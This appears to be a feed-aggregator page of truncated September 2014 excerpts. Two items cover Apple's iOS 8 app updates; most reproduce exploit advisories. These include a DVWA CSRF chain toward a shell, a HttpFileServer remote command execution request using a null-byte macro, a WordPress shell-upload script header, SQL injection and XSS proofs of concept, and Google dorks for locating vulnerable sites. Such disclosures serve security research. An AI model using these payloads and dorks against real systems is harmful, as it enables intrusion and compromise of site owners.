Apple updates all its applications with the arrival of iOS 8

17 September 2014 - Source: http://www.applezein.net/wordpress

Here is the list of Apple applications to update for iOS 8:

  • Remote;
  • Find My iPhone;
  • iTunes U;
  • Find My Friends.

Le...

Apple updates its apps: Find My iPhone, Podcasts, Remote, iTunes U and Find My Friends

17 September 2014 - Source: http://www.calmug.org

Just ahead of the launch of iOS 8, Apple has updated its applications that are not bundled with the system. Find My iPhone is updated with support for iOS 8 and Family Sharing; Remote is also updated, adding iOS 8 support alongside some performance improvements. iTunes U, besides iOS 8 compatibility, now adds due dates to the calendar automatically. Find My Friends lets you move your friends list to your iCloud account, if necessary.

...

DVWA Cross Site Request Forgery

16 September 2014 - Source: http://www.mondounix.com
<!-- There are multiple CSRF issues in DVWA. Attackers can use these CSRF exploits to
  first reset the DVWA database of victim, then make the victim log in using the default resets,
  next crafts another CSRF to change the challenge level to low to make exploitation more probable,
  then use these to craft a command execution CSRF and possibly get a shell. :) 
 
  *This PoC will open calculator as a demo execution in approximately 5 seconds.*
 
  The attacker just needs to know you have DVWA for this to work.
 
  Paulos Yibelo and Tabor N. Shiferaw  2014
 
  -->
 
  <script src='https://ajax.googleapis.com/ajax/libs/jquery/1.8.0/jquery.min.js' type='text/javascript'>
  </script>
  <div...

HttpFileServer 2.3.x Remote Command Execution

16 September 2014 - Source: http://www.mondounix.com
Affected software: http://sourceforge.net/projects/hfs/
Version : 2.3x
# Exploit Title: HttpFileServer 2.3.x Remote Command Execution
# Google Dork: intext:"httpfileserver 2.3"
# Date: 11-09-2014
# Remote: Yes
# Exploit Author: Daniele Linguaglossa
# Vendor Homepage: http://rejetto.com/
# Software Link: http://sourceforge.net/projects/hfs/
# Version: 2.3.x
# Tested on: Windows Server 2008 , Windows 8, Windows 7
# CVE : CVE-2014-6287
 
The issue exists due to a poor regex in the file ParserLib.pas
 
 
function findMacroMarker(s:string; ofs:integer=1):integer;
begin result:=reMatch(s, '\{[.:]|[.:]\}|\|', 'm!', ofs) end;
 
 
It will not handle a null byte, so a request to
 
http://localhost:80/search=%00{.exec|cmd.}
 
will...

WordPress Slideshow Gallery 1.4.6 Shell Upload

16 September 2014 - Source: http://www.mondounix.com
#!/usr/bin/env python
#
# WordPress Slideshow Gallery 1.4.6 Shell Upload Exploit
#
# WordPress Slideshow Gallery plugin version 1.4.6 suffers from a remote shell upload vulnerability (CVE-2014-5460)
#
# Vulnerability discovered by: Jesus Ramirez Pichardo - http://whitexploit.blogspot.mx/
#
# Exploit written by: Claudio Viviani - info@homelab.it - http://www.homelab.it
#
#
# Disclaimer:
#
# This exploit is intended for educational purposes only and the author
# can not be held liable for any kind of damages done whatsoever to your machine,
# or damages caused by some other,creative application of this exploit.
# In any case you disagree with the above statement,stop here.
#
#
# Requirements:
#
# 1) Enabled user management...

WordPress Photo Album Plus 5.4.4 Cross Site Scripting

15 September 2014 - Source: http://www.mondounix.com
WP Photo Album Plus Security Vulnerabilities
 
Author: Milhouse 
Download: https://wordpress.org/plugins/wp-photo-album-plus/
Home Page: http://wppa.opajaap.nl/
Google dork: inurl:wp-content/plugins/wp-photo-album-plus
 
Set up:
Wordpress Version: 3.9.1, 3.9.2
WP Photo Album Plus version: 5.4.4, 5.4.3
Client browsers: FireFox 31, Internet Explorer 8-11
 
Issue number 1: A Cross-Site Scripting (reflective) vulnerability.
Details:
The plugin echoes the value of the HTTP header “User-Agent” back to the client browser, allowing unsanitized JavaScript to be inserted.
 
Severity: Low
 
Proof of Concept (POC):
Request:
GET / HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: en-US
User-Agent:...

Joomla Spider Form Maker 4.3 SQL Injection

15 September 2014 - Source: http://www.mondounix.com
######################
 
# Exploit Title : Joomla Spider Form Maker <= 4.3 SQL Injection
 
# Exploit Author : Claudio Viviani
 
# Vendor Homepage : http://web-dorado.com/
 
# Software Link : http://web-dorado.com/products/joomla-form.html
 
# Dork Google: inurl:com_formmaker
 
 
# Date : 2014-09-07
 
# Tested on : Windows 7 / Mozilla Firefox
#             Linux / Mozilla Firefox
 
######################
 
# PoC Exploit:
 
http://localhost/index.php?option=com_formmaker&view=formmaker&id=[SQLi]
 
 
"id" variable is not sanitized.
 
 
######################
 
# Vulnerability Disclosure Timeline:
 
2014-09-07:  Discovered vulnerability
2014-09-09:...

WordPress Plugin Vulnerability Dump – Part 2

10 September 2014 - Source: http://www.mondounix.com
More vulnerabilities in poorly coded plugins for y'all.
 
Ninja Forms v2.77 - Authorization bypass (regular users can delete forms, etc)
Contact Form v3.83 - Email header injection
WP to Twitter v2.9.3 - Authorization bypass (regular users can tweet to the admin's twitter account)
Xhanch - My Twitter v2.7.7 - CSRF (create and delete tweets)
TinyMCE Advanced v4.1 - (insignificant) CSRF
W3 Total Cache v0.9.4 - (minor) CSRF
WordPress Download Manager v2.6.92 - Authorization bypass (regular users can upload/delete arbitrary files, yes, even php files)
Wordfence Security v5.2.2 - Stored XSS
 
Details and POCs located: https://vexatioustendencies.com/wordpress-plugin-vulnerability-dump-part-2/
 
More to follow.
 
-Voxel...

WordPress Spider Facebook 1.0.8 SQL Injection

9 September 2014 - Source: http://www.mondounix.com
######################
# Exploit Title : Wordpress Spider Facebook 1.0.8 Authenticated SQL Injection
 
# Exploit Author : Claudio Viviani
 
# Vendor Homepage : http://web-dorado.com/
 
# Software Link : http://downloads.wordpress.org/plugin/spider-facebook.1.0.8.zip
 
# Date : 2014-08-25
 
# Tested on : Windows 7 / Mozilla Firefox
#             Linux / Mozilla Firefox
#             Linux / sqlmap 1.0-dev-5b2ded0
 
######################
 
# Location :  
http://localhost/wp-content/plugins/plugins/spider-facebook/facebook.php
 
######################
 
# Vulnerable code :
 
function Spider_Facebook_manage()
{
        require_once("facebook_manager.php");
        require_once("facbook_manager.html.php");
...

WordPress Like Dislike Counter 1.2.3 SQL Injection

9 September 2014 - Source: http://www.mondounix.com
#################################################################################################
#
# Title                : Wordpress Like Dislike Counter Plugin SQL Injection Vulnerability
# Risk                 : High+/Critical
# Exploit Author       : XroGuE
# Google Dork          : inurl:plugins/like-dislike-counter-for-posts-pages-and-comments/ajax_counter.php  AND  plugins/pro-like-dislike-counter/ldc-ajax-counter.php
# Plugin Version       : 1.2.3
# Plugin Name          : Like Dislike Counter
# Plugin Download Link : http://downloads.wordpress.org/plugin/like-dislike-counter-for-posts-pages-and-comments.zip
# Vendor Home          : www.wpfruits.com
# Date                 : 2014/09/05
# Tested in            : Win7 - Linux
#
##################################################################################################
#...